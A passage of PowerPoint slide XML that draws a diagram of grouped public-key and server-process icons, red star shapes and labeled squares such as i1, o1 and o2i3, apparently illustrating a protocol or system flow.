            <p:cNvPr id="1064" name="Key_Public01" descr="Key_Public01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="18743434">
              <a:off x="210282" y="103857"/>
              <a:ext cx="372534" cy="733779"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1065" name="ServerProcess01" descr="ServerProcess01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="284789" y="0"/>
              <a:ext cx="760872" cy="584765"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9092071" y="2786097"/>
            <a:ext cx="234810" cy="9527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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9069493" y="4813582"/>
            <a:ext cx="234810" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1071" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8864035" y="5881511"/>
            <a:ext cx="652499" cy="643467"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1069" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1070" name="o3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="126308"/>
              <a:ext cx="652498" cy="386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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>o</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1080" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8683104" y="4804550"/>
            <a:ext cx="1045661" cy="3738881"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1045660" cy="3738880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1074" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="1149208"/>
              <a:ext cx="1045662" cy="855668"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1045660" cy="855666"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1072" name="Key_Public01" descr="Key_Public01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="18743434">
                <a:off x="210282" y="103857"/>
                <a:ext cx="372534" cy="733779"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1073" name="ServerProcess01" descr="ServerProcess01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="284789" y="0"/>
                <a:ext cx="760872" cy="584765"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1075" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="417998" y="0"/>
              <a:ext cx="234809" cy="952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69" y="14588"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18381" y="14460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="14357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15992" y="17991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12046" y="20474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9865" y="21267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8619" y="20448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6023" y="14613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15369" y="14588"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74900"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1076" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="395420" y="2027484"/>
              <a:ext cx="234810" cy="952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69" y="14588"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18381" y="14460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="14357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15992" y="17991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12046" y="20474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9865" y="21267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8619" y="20448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6023" y="14613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15369" y="14588"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74900"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1079" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="189962" y="3095413"/>
              <a:ext cx="652499" cy="643468"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="652497" cy="643466"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1077" name="Square"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2257" y="0"/>
                <a:ext cx="643468" cy="643467"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25400" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>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sp>
            <p:nvSpPr>
              <p:cNvPr id="1078" name="o3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="126308"/>
                <a:ext cx="652498" cy="386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defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr i="1"/>
                  <a:t>o</a:t>
                </a:r>
                <a:r>
                  <a:rPr baseline="-20250" i="1"/>
                  <a:t>3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1083" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8866293" y="3987235"/>
            <a:ext cx="652499" cy="643468"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1081" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1082" name="o2i3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="126308"/>
              <a:ext cx="652498" cy="386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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>o</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr i="1"/>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1086" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4289777" y="2009422"/>
            <a:ext cx="652499" cy="643467"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1084" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1085" name="i1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="126308"/>
              <a:ext cx="652498" cy="386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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1089" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4093041" y="3928533"/>
            <a:ext cx="1045661" cy="855667"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1045660" cy="855666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1087" name="Key_Public01" descr="Key_Public01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="18743434">
              <a:off x="210282" y="103857"/>
              <a:ext cx="372534" cy="733779"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1088" name="ServerProcess01" descr="ServerProcess01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="284789" y="0"/>
              <a:ext cx="760872" cy="584765"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4511039" y="2779324"/>
            <a:ext cx="234810" cy="952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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4488462" y="4806808"/>
            <a:ext cx="234809" cy="9527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69" y="14588"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="14460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="17991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="20474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="21267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="20448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="14613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="14588"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1094" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4283004" y="5874737"/>
            <a:ext cx="652499" cy="643468"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="652497" cy="643466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1092" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257" y="0"/>
              <a:ext cx="643468" cy="643467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1093" name="o1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="126308"/>
              <a:ext cx="652498" cy="386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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr i="1"/>
                <a:t>o</a:t>
              </a:r>
              <a:r>
                <a:rPr baseline="-20250" i="1"/>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1103" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4102072" y="4797777"/>
            <a:ext cx="1045662" cy="3738881"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1045660" cy="3738880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1097" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="1149208"/>
              <a:ext cx="1045662" cy="855668"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1045660" cy="855666"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1095" name="Key_Public01" descr="Key_Public01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm rot="18743434">
                <a:off x="210282" y="103857"/>
                <a:ext cx="372534" cy="733779"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1096" name="ServerProcess01" descr="ServerProcess01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="284789" y="0"/>
                <a:ext cx="760872" cy="584765"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1098" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="417998" y="0"/>
              <a:ext cx="234809" cy="952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69" y="14588"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18381" y="14460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="14357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15992" y="17991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12046" y="20474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9865" y="21267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8619" y="20448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6023" y="14613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10281" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15369" y="14588"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74900"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1099" name="Shape"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="395420" y="2027484"/>
              <a:ext cx="234810" cy="952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69" y="14588"/>
